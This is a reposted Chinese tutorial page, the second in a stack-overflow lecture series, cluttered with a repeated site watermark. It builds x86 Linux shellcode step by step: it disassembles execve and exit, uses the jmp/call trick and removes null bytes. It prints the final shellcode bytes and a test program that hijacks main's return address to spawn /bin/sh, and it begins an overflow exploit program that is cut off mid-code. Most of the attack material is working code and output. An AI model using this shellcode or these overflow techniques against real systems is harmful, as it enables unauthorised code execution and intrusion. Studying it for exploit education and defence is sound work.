当前位置：中国易下载软件教材中心 → 文章中心 → 黑客技术 → 解密破解 → 堆栈溢出系列讲座(2)

堆栈溢出系列讲座(2)

减小字体

增大字体作者：佚名来源：不详发布时间：2007-8-20 16:31:09

^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
喜欢这些内容嘛，请告诉你身边的朋友，易下载中心－QQ资源－itnetcn.com一起享受这份乐趣，本站内容来源互联网
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^

一：shellcode基本算法分析 jhW海岸线网络安全资讯站
jhW海岸线网络安全资讯站
jhW海岸线网络安全资讯站
在程序中，执行一个shell的程序是这样写的： jhW海岸线网络安全资讯站
jhW海岸线网络安全资讯站
shellcode.c jhW海岸线网络安全资讯站
jhW海岸线网络安全资讯站
------------------------------------------------------------------------ jhW海岸线网络安全资讯站
jhW海岸线网络安全资讯站
jhW海岸线网络安全资讯站
jhW海岸线网络安全资讯站
jhW海岸线网络安全资讯站
jhW海岸线网络安全资讯站
void main() { jhW海岸线网络安全资讯站
jhW海岸线网络安全资讯站
　char *name[2]; jhW海岸线网络安全资讯站
jhW海岸线网络安全资讯站
jhW海岸线网络安全资讯站
jhW海岸线网络安全资讯站
　name[0] = "/bin/sh"; jhW海岸线网络安全资讯站
jhW海岸线网络安全资讯站
　name[1] = NULL; jhW海岸线网络安全资讯站
jhW海岸线网络安全资讯站
　execve(name[0], name, NULL); jhW海岸线网络安全资讯站
jhW海岸线网络安全资讯站
} jhW海岸线网络安全资讯站
jhW海岸线网络安全资讯站
------------------------------------------------------------------------ jhW海岸线网络安全资讯站
jhW海岸线网络安全资讯站
execve函数将执行一个程序。他需要程序的名字地址作为第一个参数。一个内容为该程序 jhW海岸线网络安全资讯站
jhW海岸线网络安全资讯站
的argv[i]（argv[n-1]=0)的指针数组作为第二个参数，以及(char*) 0作为第三个参数。 jhW海岸线网络安全资讯站
jhW海岸线网络安全资讯站
jhW海岸线网络安全资讯站
jhW海岸线网络安全资讯站
我们来看以看execve的汇编代码： jhW海岸线网络安全资讯站
jhW海岸线网络安全资讯站
[nkl10]$ gcc -o shellcode -static shellcode.c jhW海岸线网络安全资讯站
jhW海岸线网络安全资讯站
[nkl10]$ gdb shellcode jhW海岸线网络安全资讯站
jhW海岸线网络安全资讯站
(gdb) disassemble __execve jhW海岸线网络安全资讯站
jhW海岸线网络安全资讯站
Dump of assembler code for function __execve: jhW海岸线网络安全资讯站
jhW海岸线网络安全资讯站
0x80002bc <__execve>:　 pushl　%ebp　　　　　　　　　　 ; jhW海岸线网络安全资讯站
jhW海岸线网络安全资讯站
0x80002bd <__execve+1>: movl　 %esp,%ebp jhW海岸线网络安全资讯站
jhW海岸线网络安全资讯站
　　　　　　　　　　　 ;上面是函数头。 jhW海岸线网络安全资讯站
jhW海岸线网络安全资讯站
0x80002bf <__execve+3>: pushl　%ebx jhW海岸线网络安全资讯站
jhW海岸线网络安全资讯站
　　　　　　　　　　　 ;保存ebx jhW海岸线网络安全资讯站
jhW海岸线网络安全资讯站
0x80002c0 <__execve+4>: movl　 $0xb,%eax jhW海岸线网络安全资讯站
jhW海岸线网络安全资讯站
　　　　　　　　　　　 ;eax=0xb，eax指明第几号系统调用。 jhW海岸线网络安全资讯站
jhW海岸线网络安全资讯站
0x80002c5 <__execve+9>: movl　 0x8(%ebp),%ebx jhW海岸线网络安全资讯站
jhW海岸线网络安全资讯站
　　　　　　　　　　　 ;ebp+8是第一个参数"/bin/sh\0" jhW海岸线网络安全资讯站
jhW海岸线网络安全资讯站
0x80002c8 <__execve+12>:　　　　movl　 0xc(%ebp),%ecx jhW海岸线网络安全资讯站
jhW海岸线网络安全资讯站
　　　　　　　　　　　 ;ebp+12是第二个参数name数组的地址 jhW海岸线网络安全资讯站
jhW海岸线网络安全资讯站
0x80002cb <__execve+15>:　　　　movl　 0x10(%ebp),%edx jhW海岸线网络安全资讯站
jhW海岸线网络安全资讯站
　　　　　　　　　　　 ;ebp+16是第三个参数空指针的地址。 jhW海岸线网络安全资讯站
jhW海岸线网络安全资讯站
　　　　　　　　　　　 ;name[2-1]内容为NULL，用来存放返回值。 jhW海岸线网络安全资讯站
jhW海岸线网络安全资讯站
0x80002ce <__execve+18>:　　　　int　　$0x80 jhW海岸线网络安全资讯站
jhW海岸线网络安全资讯站
　　　　　　　　　　　 ;执行0xb号系统调用(execve) jhW海岸线网络安全资讯站
jhW海岸线网络安全资讯站
0x80002d0 <__execve+20>:　　　　movl　 %eax,%edx jhW海岸线网络安全资讯站
jhW海岸线网络安全资讯站
　　　　　　　　　　　 ;下面是返回值的处理就没有用了。 jhW海岸线网络安全资讯站
jhW海岸线网络安全资讯站
0x80002d2 <__execve+22>:　　　　testl　%edx,%edx jhW海岸线网络安全资讯站
jhW海岸线网络安全资讯站
0x80002d4 <__execve+24>:　　　　jnl　　0x80002e6 <__execve+42> jhW海岸线网络安全资讯站
jhW海岸线网络安全资讯站
0x80002d6 <__execve+26>:　　　　negl　 %edx jhW海岸线网络安全资讯站
jhW海岸线网络安全资讯站
0x80002d8 <__execve+28>:　　　　pushl　%edx jhW海岸线网络安全资讯站
jhW海岸线网络安全资讯站
0x80002d9 <__execve+29>:　　　　call　 0x8001a34 jhW海岸线网络安全资讯站
jhW海岸线网络安全资讯站
<__normal_errno_location> jhW海岸线网络安全资讯站
jhW海岸线网络安全资讯站
0x80002de <__execve+34>:　　　　popl　 %edx jhW海岸线网络安全资讯站
jhW海岸线网络安全资讯站
0x80002df <__execve+35>:　　　　movl　 %edx,(%eax) jhW海岸线网络安全资讯站
jhW海岸线网络安全资讯站
0x80002e1 <__execve+37>:　　　　movl　 $0xffffffff,%eax jhW海岸线网络安全资讯站
jhW海岸线网络安全资讯站
0x80002e6 <__execve+42>:　　　　popl　 %ebx jhW海岸线网络安全资讯站
jhW海岸线网络安全资讯站
0x80002e7 <__execve+43>:　　　　movl　 %ebp,%esp jhW海岸线网络安全资讯站
jhW海岸线网络安全资讯站
0x80002e9 <__execve+45>:　　　　popl　 %ebp jhW海岸线网络安全资讯站
jhW海岸线网络安全资讯站
0x80002ea <__execve+46>:　　　　ret jhW海岸线网络安全资讯站
jhW海岸线网络安全资讯站
0x80002eb <__execve+47>:　　　　nop jhW海岸线网络安全资讯站
jhW海岸线网络安全资讯站
End of assembler dump. jhW海岸线网络安全资讯站
jhW海岸线网络安全资讯站
jhW海岸线网络安全资讯站
jhW海岸线网络安全资讯站
经过以上的分析，可以得到如下的精简指令算法： jhW海岸线网络安全资讯站
jhW海岸线网络安全资讯站
movl　 $execve的系统调用号,%eax jhW海岸线网络安全资讯站
jhW海岸线网络安全资讯站
movl　 "bin/sh\0"的地址,%ebx jhW海岸线网络安全资讯站
jhW海岸线网络安全资讯站
movl　 name数组的地址,%ecx jhW海岸线网络安全资讯站
jhW海岸线网络安全资讯站
movl　 name[n-1]的地址,%edx jhW海岸线网络安全资讯站
jhW海岸线网络安全资讯站
int　　$0x80　　　　　　;执行系统调用(execve) jhW海岸线网络安全资讯站
jhW海岸线网络安全资讯站
jhW海岸线网络安全资讯站
jhW海岸线网络安全资讯站
当execve执行成功后，程序shellcode就会退出，/bin/sh将作为子进程继续执行。可是， jhW海岸线网络安全资讯站
jhW海岸线网络安全资讯站
如果我们的execve执行失败，（比如没有/bin/sh这个文件），CPU就会继续执行后续的 jhW海岸线网络安全资讯站
jhW海岸线网络安全资讯站
指令，结果不知道跑到哪里去了。所以必须再执行一个exit（）系统调用， jhW海岸线网络安全资讯站
jhW海岸线网络安全资讯站
结束shellcode.c的执行。 jhW海岸线网络安全资讯站
jhW海岸线网络安全资讯站
jhW海岸线网络安全资讯站
jhW海岸线网络安全资讯站
我们来看以看exit(0)的汇编代码： jhW海岸线网络安全资讯站
jhW海岸线网络安全资讯站
(gdb) disassemble _exit jhW海岸线网络安全资讯站
Dump of assembler code for function _exit: jhW海岸线网络安全资讯站
jhW海岸线网络安全资讯站
0x800034c <_exit>:　　　pushl　%ebp jhW海岸线网络安全资讯站
jhW海岸线网络安全资讯站
0x800034d <_exit+1>:　　movl　 %esp,%ebp jhW海岸线网络安全资讯站
jhW海岸线网络安全资讯站
0x800034f <_exit+3>:　　pushl　%ebx jhW海岸线网络安全资讯站
jhW海岸线网络安全资讯站
0x8000350 <_exit+4>:　　movl　 $0x1,%eax　　　　;1号系统调用 jhW海岸线网络安全资讯站
jhW海岸线网络安全资讯站
0x8000355 <_exit+9>:　　movl　 0x8(%ebp),%ebx　 ;ebx为参数0 jhW海岸线网络安全资讯站
jhW海岸线网络安全资讯站
0x8000358 <_exit+12>:　 int　　$0x80　　　　　　;引发系统调用 jhW海岸线网络安全资讯站
jhW海岸线网络安全资讯站
0x800035a <_exit+14>:　 movl　 0xfffffffc(%ebp),%ebx jhW海岸线网络安全资讯站
jhW海岸线网络安全资讯站
0x800035d <_exit+17>:　 movl　 %ebp,%esp jhW海岸线网络安全资讯站
jhW海岸线网络安全资讯站
0x800035f <_exit+19>:　 popl　 %ebp jhW海岸线网络安全资讯站
jhW海岸线网络安全资讯站
0x8000360 <_exit+20>:　 ret jhW海岸线网络安全资讯站
jhW海岸线网络安全资讯站
0x8000361 <_exit+21>:　 nop jhW海岸线网络安全资讯站
jhW海岸线网络安全资讯站
0x8000362 <_exit+22>:　 nop jhW海岸线网络安全资讯站
jhW海岸线网络安全资讯站
0x8000363 <_exit+23>:　 nop jhW海岸线网络安全资讯站
jhW海岸线网络安全资讯站
End of assembler dump. jhW海岸线网络安全资讯站
jhW海岸线网络安全资讯站
jhW海岸线网络安全资讯站
jhW海岸线网络安全资讯站
jhW海岸线网络安全资讯站
jhW海岸线网络安全资讯站
看来exit(0)〕的汇编代码更加简单： jhW海岸线网络安全资讯站
jhW海岸线网络安全资讯站
movl　 $0x1,%eax　　　　;1号系统调用 jhW海岸线网络安全资讯站
jhW海岸线网络安全资讯站
movl　 0,%ebx　　　　　 ;ebx为exit的参数0 jhW海岸线网络安全资讯站
jhW海岸线网络安全资讯站
int　　$0x80　　　　　　;引发系统调用 jhW海岸线网络安全资讯站
jhW海岸线网络安全资讯站
jhW海岸线网络安全资讯站
jhW海岸线网络安全资讯站
那么总结一下，合成的汇编代码为： jhW海岸线网络安全资讯站
jhW海岸线网络安全资讯站
movl　 $execve的系统调用号,%eax jhW海岸线网络安全资讯站
jhW海岸线网络安全资讯站
movl　 "bin/sh\0"的地址,%ebx jhW海岸线网络安全资讯站
jhW海岸线网络安全资讯站
movl　 name数组的地址,%ecx jhW海岸线网络安全资讯站
jhW海岸线网络安全资讯站
movl　 name[n-1]的地址,%edx jhW海岸线网络安全资讯站
jhW海岸线网络安全资讯站
int　　$0x80　　　　　　;执行系统调用(execve) jhW海岸线网络安全资讯站
jhW海岸线网络安全资讯站
movl　 $0x1,%eax　　　　;1号系统调用 jhW海岸线网络安全资讯站
jhW海岸线网络安全资讯站
movl　 0,%ebx　　　　　 ;ebx为exit的参数0 jhW海岸线网络安全资讯站
jhW海岸线网络安全资讯站
int　　$0x80　　　　　　;执行系统调用(exit) jhW海岸线网络安全资讯站
jhW海岸线网络安全资讯站
jhW海岸线网络安全资讯站
jhW海岸线网络安全资讯站
二：实现一个shellcode jhW海岸线网络安全资讯站
jhW海岸线网络安全资讯站
jhW海岸线网络安全资讯站
jhW海岸线网络安全资讯站
好，我们来实现这个算法。首先我们必须有一个字符串“/bin/sh”,还得有一个name数组 jhW海岸线网络安全资讯站
jhW海岸线网络安全资讯站
。我们可以构造它们出来，可是，在shellcode中如何知道它们的地址呢？每一次程序都是 jhW海岸线网络安全资讯站
jhW海岸线网络安全资讯站
动态加载，字符串和name数组的地址都不是固定的。 jhW海岸线网络安全资讯站
jhW海岸线网络安全资讯站
jhW海岸线网络安全资讯站
jhW海岸线网络安全资讯站
通过JMP和call的结合，黑客们巧妙的解决了这个问题。 jhW海岸线网络安全资讯站
jhW海岸线网络安全资讯站
------------------------------------------------------------------------ jhW海岸线网络安全资讯站
jhW海岸线网络安全资讯站
jmp　　call的偏移地址　　　　　 # 2 bytes jhW海岸线网络安全资讯站
jhW海岸线网络安全资讯站
popl　 %esi　　　　　　　　　　 # 1 byte　　　　//popl出来的是string的地址。 jhW海岸线网络安全资讯站
jhW海岸线网络安全资讯站
movl　 %esi,array-offset(%esi)　# 3 bytes　　　 //在string+8处构造 name数组， jhW海岸线网络安全资讯站
jhW海岸线网络安全资讯站
jhW海岸线网络安全资讯站
jhW海岸线网络安全资讯站
　　　　　　　　　　　　　　　　　　　　　　　 //name[0]放 string的地址 jhW海岸线网络安全资讯站
jhW海岸线网络安全资讯站
jhW海岸线网络安全资讯站
jhW海岸线网络安全资讯站
movb　 $0x0,nullbyteoffset(%esi)# 4 bytes　　　 //string+7处放0作为string的结 jhW海岸线网络安全资讯站
jhW海岸线网络安全资讯站
尾。 jhW海岸线网络安全资讯站
jhW海岸线网络安全资讯站
movl　 $0x0,null-offset(%esi)　 # 7 bytes　　　 //name[1]放0。 jhW海岸线网络安全资讯站
jhW海岸线网络安全资讯站
movl　 $0xb,%eax　　　　　　　　# 5 bytes　　　 //eax=0xb是execve的syscall代码 jhW海岸线网络安全资讯站
jhW海岸线网络安全资讯站
。 jhW海岸线网络安全资讯站
jhW海岸线网络安全资讯站
movl　 %esi,%ebx　　　　　　　　# 2 bytes　　　 //ebx=string的地址 jhW海岸线网络安全资讯站
jhW海岸线网络安全资讯站
leal　 array-offset,(%esi),%ecx # 3 bytes　　　 //ecx=name数组的开始地址 jhW海岸线网络安全资讯站
jhW海岸线网络安全资讯站
leal　 null-offset(%esi),%edx　 # 3 bytes　　　 //edx=name〔1]的地址 jhW海岸线网络安全资讯站
jhW海岸线网络安全资讯站
int　　$0x80　　　　　　　　　　# 2 bytes　　　 //int 0x80是sys call jhW海岸线网络安全资讯站
jhW海岸线网络安全资讯站
movl　 $0x1, %eax　　　　　　　 # 5 bytes　　　 //eax=0x1是exit的syscall代码 jhW海岸线网络安全资讯站
jhW海岸线网络安全资讯站
movl　 $0x0, %ebx　　　　　　　 # 5 bytes　　　 //ebx=0是exit的返回值 jhW海岸线网络安全资讯站
jhW海岸线网络安全资讯站
int　　$0x80　　　　　　　　　　# 2 bytes　　　 //int 0x80是sys call jhW海岸线网络安全资讯站
jhW海岸线网络安全资讯站
call　 popl 的偏移地址　　　　　# 5 bytes　　　 //这里放call,string 的地址就会 jhW海岸线网络安全资讯站
jhW海岸线网络安全资讯站
作 jhW海岸线网络安全资讯站
jhW海岸线网络安全资讯站
　　　　　　　　　　　　　　　　　　　　　　　 //为返回地址压栈。 jhW海岸线网络安全资讯站
jhW海岸线网络安全资讯站
/bin/sh 字符串 jhW海岸线网络安全资讯站
jhW海岸线网络安全资讯站
------------------------------------------------------------------------ jhW海岸线网络安全资讯站
jhW海岸线网络安全资讯站
首先使用JMP相对地址来跳转到call,执行完call指令，字符串/bin/sh的地址将作为call的 jhW海岸线网络安全资讯站
jhW海岸线网络安全资讯站
返回地址压入堆栈。现在来到popl esi，把刚刚压入栈中的字符串地址取出来，就获得了 jhW海岸线网络安全资讯站
jhW海岸线网络安全资讯站
字符串的真实地址。然后，在字符串的第8个字节赋0，作为串的结尾。后面8个字节，构造 jhW海岸线网络安全资讯站
jhW海岸线网络安全资讯站
name数组（两个整数，八个字节）。 jhW海岸线网络安全资讯站
jhW海岸线网络安全资讯站
jhW海岸线网络安全资讯站
jhW海岸线网络安全资讯站
我们可以写shellcode了。先写出汇编源程序。 jhW海岸线网络安全资讯站
jhW海岸线网络安全资讯站
shellcodeasm.c jhW海岸线网络安全资讯站
jhW海岸线网络安全资讯站
------------------------------------------------------------------------jhW海岸线网络安全资讯站
void main() { jhW海岸线网络安全资讯站
jhW海岸线网络安全资讯站
__asm__(" jhW海岸线网络安全资讯站
jhW海岸线网络安全资讯站
　　　 jmp　　0x2a　　　　　　　　　　 # 3 bytes jhW海岸线网络安全资讯站
jhW海岸线网络安全资讯站
　　　 popl　 %esi　　　　　　　　　　 # 1 byte jhW海岸线网络安全资讯站
jhW海岸线网络安全资讯站
　　　 movl　 %esi,0x8(%esi)　　　　　 # 3 bytes jhW海岸线网络安全资讯站
jhW海岸线网络安全资讯站
　　　 movb　 $0x0,0x7(%esi)　　　　　 # 4 bytes jhW海岸线网络安全资讯站
jhW海岸线网络安全资讯站
　　　 movl　 $0x0,0xc(%esi)　　　　　 # 7 bytes jhW海岸线网络安全资讯站
jhW海岸线网络安全资讯站
　　　 movl　 $0xb,%eax　　　　　　　　# 5 bytes jhW海岸线网络安全资讯站
jhW海岸线网络安全资讯站
　　　 movl　 %esi,%ebx　　　　　　　　# 2 bytes jhW海岸线网络安全资讯站
jhW海岸线网络安全资讯站
　　　 leal　 0x8(%esi),%ecx　　　　　 # 3 bytes jhW海岸线网络安全资讯站
jhW海岸线网络安全资讯站
　　　 leal　 0xc(%esi),%edx　　　　　 # 3 bytes jhW海岸线网络安全资讯站
jhW海岸线网络安全资讯站
　　　 int　　$0x80　　　　　　　　　　# 2 bytes jhW海岸线网络安全资讯站
jhW海岸线网络安全资讯站
　　　 movl　 $0x1, %eax　　　　　　　 # 5 bytes jhW海岸线网络安全资讯站
jhW海岸线网络安全资讯站
　　　 movl　 $0x0, %ebx　　　　　　　 # 5 bytes jhW海岸线网络安全资讯站
jhW海岸线网络安全资讯站
　　　 int　　$0x80　　　　　　　　　　# 2 bytes jhW海岸线网络安全资讯站
jhW海岸线网络安全资讯站
　　　 call　 -0x2f　　　　　　　　　　# 5 bytes jhW海岸线网络安全资讯站
jhW海岸线网络安全资讯站
　　　 .string \"/bin/sh\"　　　　　　 # 8 bytes jhW海岸线网络安全资讯站
jhW海岸线网络安全资讯站
"); jhW海岸线网络安全资讯站
jhW海岸线网络安全资讯站
} jhW海岸线网络安全资讯站
jhW海岸线网络安全资讯站
------------------------------------------------------------------------ jhW海岸线网络安全资讯站
jhW海岸线网络安全资讯站
编译后，用gdb的 jhW海岸线网络安全资讯站
jhW海岸线网络安全资讯站
b/bx 〔地址〕 jhW海岸线网络安全资讯站
jhW海岸线网络安全资讯站
命令可以得到十六进制的表示。 jhW海岸线网络安全资讯站
jhW海岸线网络安全资讯站
下面，写出测试程序如下：（注意，这个test程序是测试shellcode的基本程序） jhW海岸线网络安全资讯站
jhW海岸线网络安全资讯站
jhW海岸线网络安全资讯站
jhW海岸线网络安全资讯站
test.c jhW海岸线网络安全资讯站
jhW海岸线网络安全资讯站
------------------------------------------------------------------------ jhW海岸线网络安全资讯站
jhW海岸线网络安全资讯站
jhW海岸线网络安全资讯站
jhW海岸线网络安全资讯站
char shellcode[] = jhW海岸线网络安全资讯站
jhW海岸线网络安全资讯站
　　　 "\xeb\x2a\x5e\x89\x76\x08\xc6\x46\x07\x00\xc7\x46\x0c\x00\x00\x00" jhW海岸线网络安全资讯站
jhW海岸线网络安全资讯站
　　　 "\x00\xb8\x0b\x00\x00\x00\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80" jhW海岸线网络安全资讯站
jhW海岸线网络安全资讯站
　　　 "\xb8\x01\x00\x00\x00\xbb\x00\x00\x00\x00\xcd\x80\xe8\xd1\xff\xff" jhW海岸线网络安全资讯站
jhW海岸线网络安全资讯站
　　　 "\xff\x2f\x62\x69\x6e\x2f\x73\x68\x00\x89\xec\x5d\xc3"; jhW海岸线网络安全资讯站
jhW海岸线网络安全资讯站
jhW海岸线网络安全资讯站
jhW海岸线网络安全资讯站
void main() { jhW海岸线网络安全资讯站
jhW海岸线网络安全资讯站
　int *ret; jhW海岸线网络安全资讯站
jhW海岸线网络安全资讯站
jhW海岸线网络安全资讯站
jhW海岸线网络安全资讯站
　ret = (int *);ret + 2;　　　 //ret 等于main（）的返回地址 jhW海岸线网络安全资讯站
jhW海岸线网络安全资讯站
　　　　　　　　　　　　　　　 //(＋2是因为：有pushl ebp ,否则加1就可以了。） jhW海岸线网络安全资讯站
jhW海岸线网络安全资讯站
jhW海岸线网络安全资讯站
jhW海岸线网络安全资讯站
　(*ret) = (int)shellcode;　　 //修改main（）的返回地址为shellcode的开始地 jhW海岸线网络安全资讯站
jhW海岸线网络安全资讯站
址。 jhW海岸线网络安全资讯站
jhW海岸线网络安全资讯站
jhW海岸线网络安全资讯站
jhW海岸线网络安全资讯站
} jhW海岸线网络安全资讯站
jhW海岸线网络安全资讯站
jhW海岸线网络安全资讯站
jhW海岸线网络安全资讯站
------------------------------------------------------------------------ jhW海岸线网络安全资讯站
jhW海岸线网络安全资讯站
------------------------------------------------------------------------ jhW海岸线网络安全资讯站
jhW海岸线网络安全资讯站
[nkl10]$ gcc -o test test.c jhW海岸线网络安全资讯站
jhW海岸线网络安全资讯站
[nkl10]$ ./test jhW海岸线网络安全资讯站
jhW海岸线网络安全资讯站
$ exit jhW海岸线网络安全资讯站
jhW海岸线网络安全资讯站
[nkl10]$ jhW海岸线网络安全资讯站
jhW海岸线网络安全资讯站
------------------------------------------------------------------------ jhW海岸线网络安全资讯站
jhW海岸线网络安全资讯站
我们通过一个shellcode数组来存放shellcode，当我们把程序（test.c）的返回地址ret jhW海岸线网络安全资讯站
jhW海岸线网络安全资讯站
设置成shellcode数组的开始地址时，程序在返回的时候就会去执行我们的shellcode，从 jhW海岸线网络安全资讯站
jhW海岸线网络安全资讯站
而我们得到了一个shell。 jhW海岸线网络安全资讯站
jhW海岸线网络安全资讯站
jhW海岸线网络安全资讯站
jhW海岸线网络安全资讯站
运行结果，得到了bsh的提示符$,表明成功的开了一个shell。 jhW海岸线网络安全资讯站
jhW海岸线网络安全资讯站
jhW海岸线网络安全资讯站
jhW海岸线网络安全资讯站
这里有必要解释的是，我们把shellcode作为一个全局变量开在了数据段而不是作为一段 jhW海岸线网络安全资讯站
jhW海岸线网络安全资讯站
代码。是因为在操作系统中，程序代码段的内容是具有只读属性的。不能修改。而我们的 jhW海岸线网络安全资讯站
jhW海岸线网络安全资讯站
代码中movl　 %esi,0x8(%esi)等语句都修改了代码的一部分，所以不能放在代码段。 jhW海岸线网络安全资讯站
jhW海岸线网络安全资讯站
jhW海岸线网络安全资讯站
jhW海岸线网络安全资讯站
这个shellcode可以了吗？很遗憾，还差了一点。大家回想一下，在堆栈溢出中，关键在 jhW海岸线网络安全资讯站
jhW海岸线网络安全资讯站
于字符串数组的写越界。但是，gets，strcpy等字符串函数在处理字符串的时候，以"\0" jhW海岸线网络安全资讯站
jhW海岸线网络安全资讯站
为字符串结尾。遇\0就结束了写操作。而我们的shellcode串中有大量的\0字符。因此， jhW海岸线网络安全资讯站
jhW海岸线网络安全资讯站
对于gets（name）来说，上面的shellcode是不可行的。我们的shellcode是不能有\0字符 jhW海岸线网络安全资讯站
jhW海岸线网络安全资讯站
出现的。 jhW海岸线网络安全资讯站
jhW海岸线网络安全资讯站
jhW海岸线网络安全资讯站
jhW海岸线网络安全资讯站
因此，有些指令需要修改一下： jhW海岸线网络安全资讯站
jhW海岸线网络安全资讯站
　　　　　旧的指令　　　　　　　　　　　　　　新的指令 jhW海岸线网络安全资讯站
jhW海岸线网络安全资讯站
　　　　　--------------------------------------------------------jhW海岸线网络安全资讯站
　　　　　movb　 $0x0,0x7(%esi)　　　　　　　　xorl　 %eax,%eax jhW海岸线网络安全资讯站
jhW海岸线网络安全资讯站
　　　　　molv　 $0x0,0xc(%esi)　　　　　　　　movb　 %eax,0x7(%esi) jhW海岸线网络安全资讯站
jhW海岸线网络安全资讯站
　　　　　　　　　　　　　　　　　　　　　　　 movl　 %eax,0xc(%esi) jhW海岸线网络安全资讯站
jhW海岸线网络安全资讯站
　　　　　-------------------------------------------------------- jhW海岸线网络安全资讯站
jhW海岸线网络安全资讯站
　　　　　movl　 $0xb,%eax　　　　　　　　　　 movb　 $0xb,%al jhW海岸线网络安全资讯站
jhW海岸线网络安全资讯站
　　　　　-------------------------------------------------------- jhW海岸线网络安全资讯站
jhW海岸线网络安全资讯站
　　　　　movl　 $0x1, %eax　　　　　　　　　　xorl　 %ebx,%ebx jhW海岸线网络安全资讯站
jhW海岸线网络安全资讯站
　　　　　movl　 $0x0, %ebx　　　　　　　　　　movl　 %ebx,%eax jhW海岸线网络安全资讯站
jhW海岸线网络安全资讯站
　　　　　　　　　　　　　　　　　　　　　　　 inc　　%eax jhW海岸线网络安全资讯站
jhW海岸线网络安全资讯站
　　　　　-------------------------------------------------------- jhW海岸线网络安全资讯站
jhW海岸线网络安全资讯站
jhW海岸线网络安全资讯站
jhW海岸线网络安全资讯站
最后的shellcode为： jhW海岸线网络安全资讯站
jhW海岸线网络安全资讯站
------------------------------------------------------------------------ jhW海岸线网络安全资讯站
jhW海岸线网络安全资讯站
char shellcode[]= jhW海岸线网络安全资讯站
jhW海岸线网络安全资讯站
00　　　　"\xeb\x1f"　　　　　　　　　　　/* jmp 0x1f　　　　　　　*/ jhW海岸线网络安全资讯站
jhW海岸线网络安全资讯站
02　　　　"\x5e"　　　　　　　　　　　　　/* popl %esi　　　　　　 */ jhW海岸线网络安全资讯站
jhW海岸线网络安全资讯站
03　　　　"\x89\x76\x08"　　　　　　　　　/* movl %esi,0x8(%esi)　 */ jhW海岸线网络安全资讯站
jhW海岸线网络安全资讯站
06　　　　"\x31\xc0"　　　　　　　　　　　/* xorl %eax,%eax　　　　*/ jhW海岸线网络安全资讯站
jhW海岸线网络安全资讯站
08　　　　"\x88\x46\x07"　　　　　　　　　/* movb %eax,0x7(%esi)　 */ jhW海岸线网络安全资讯站
jhW海岸线网络安全资讯站
0b　　　　"\x89\x46\x0c"　　　　　　　　　/* movl %eax,0xc(%esi)　 */ jhW海岸线网络安全资讯站
jhW海岸线网络安全资讯站
0e　　　　"\xb0\x0b"　　　　　　　　　　　/* movb $0xb,%al　　　　 */ jhW海岸线网络安全资讯站
jhW海岸线网络安全资讯站
10　　　　"\x89\xf3"　　　　　　　　　　　/* movl %esi,%ebx　　　　*/ jhW海岸线网络安全资讯站
jhW海岸线网络安全资讯站
12　　　　"\x8d\x4e\x08"　　　　　　　　　/* leal 0x8(%esi),%ecx　 */ jhW海岸线网络安全资讯站
jhW海岸线网络安全资讯站
15　　　　"\x8d\x56\x0c"　　　　　　　　　/* leal 0xc(%esi),%edx　 */ jhW海岸线网络安全资讯站
jhW海岸线网络安全资讯站
18　　　　"\xcd\x80"　　　　　　　　　　　/* int $0x80　　　　　　 */ jhW海岸线网络安全资讯站
jhW海岸线网络安全资讯站
1a　　　　"\x31\xdb"　　　　　　　　　　　/* xorl %ebx,%ebx　　　　*/ jhW海岸线网络安全资讯站
jhW海岸线网络安全资讯站
1c　　　　"\x89\xd8"　　　　　　　　　　　/* movl %ebx,%eax　　　　*/ jhW海岸线网络安全资讯站
jhW海岸线网络安全资讯站
1e　　　　"\x40"　　　　　　　　　　　　　/* inc %eax　　　　　　　*/ jhW海岸线网络安全资讯站
jhW海岸线网络安全资讯站
1f　　　　"\xcd\x80"　　　　　　　　　　　/* int $0x80　　　　　　 */ jhW海岸线网络安全资讯站
jhW海岸线网络安全资讯站
21　　　　"\xe8\xdc\xff\xff\xff"　　　　　/* call -0x24　　　　　　*/ jhW海岸线网络安全资讯站
jhW海岸线网络安全资讯站
26　　　　"/bin/sh";　　　　　　　　　　　/* .string \"/bin/sh\"　 */ jhW海岸线网络安全资讯站
jhW海岸线网络安全资讯站
------------------------------------------------------------------------ jhW海岸线网络安全资讯站
jhW海岸线网络安全资讯站
jhW海岸线网络安全资讯站
jhW海岸线网络安全资讯站
三：利用堆栈溢出获得shell jhW海岸线网络安全资讯站
jhW海岸线网络安全资讯站
jhW海岸线网络安全资讯站
jhW海岸线网络安全资讯站
好了，现在我们已经制造了一次堆栈溢出，写好了一个shellcode。准备工作都已经作完， jhW海岸线网络安全资讯站
jhW海岸线网络安全资讯站
我们把二者结合起来，就写出一个利用堆栈溢出获得shell的程序。 jhW海岸线网络安全资讯站
jhW海岸线网络安全资讯站
overflow1.c jhW海岸线网络安全资讯站
jhW海岸线网络安全资讯站
------------------------------------------------------------------------ jhW海岸线网络安全资讯站
jhW海岸线网络安全资讯站
char shellcode[] = jhW海岸线网络安全资讯站
jhW海岸线网络安全资讯站
jhW海岸线网络安全资讯站
jhW海岸线网络安全资讯站
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b" jhW海岸线网络安全资讯站
jhW海岸线网络安全资讯站
jhW海岸线网络安全资讯站
jhW海岸线网络安全资讯站
"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd" jhW海岸线网络安全资讯站
jhW海岸线网络安全资讯站
　　　 "\x80\xe8\xdc\xff\xff\xff/bin/sh"; jhW海岸线网络安全资讯站
jhW海岸线网络安全资讯站
jhW海岸线网络安全资讯站
jhW海岸线网络安全资讯站
char large_string[128]; jhW海岸线网络安全资讯站
jhW海岸线网络安全资讯站
jhW海岸线网络安全资讯站
jhW海岸线网络安全资讯站
void main() { jhW海岸线网络安全资讯站
jhW海岸线网络安全资讯站
char buffer[96]; jhW海岸线网络安全资讯站
jhW海岸线网络安全资讯站
int i; jhW海岸线网络安全资讯站
jhW海岸线网络安全资讯站
long *long_ptr = (long *) large_string; jhW海岸线网络安全资讯站
jhW海岸线网络安全资讯站
jhW海岸线网络安全资讯站
jhW海岸线网络安全资讯站
for (i = 0; i < 32; i++) jhW海岸线网络安全资讯站
jhW海岸线网络安全资讯站
　 *(long_ptr + i) = (int) buffer; jhW海岸线网络安全资讯站
jhW海岸线网络安全资讯站
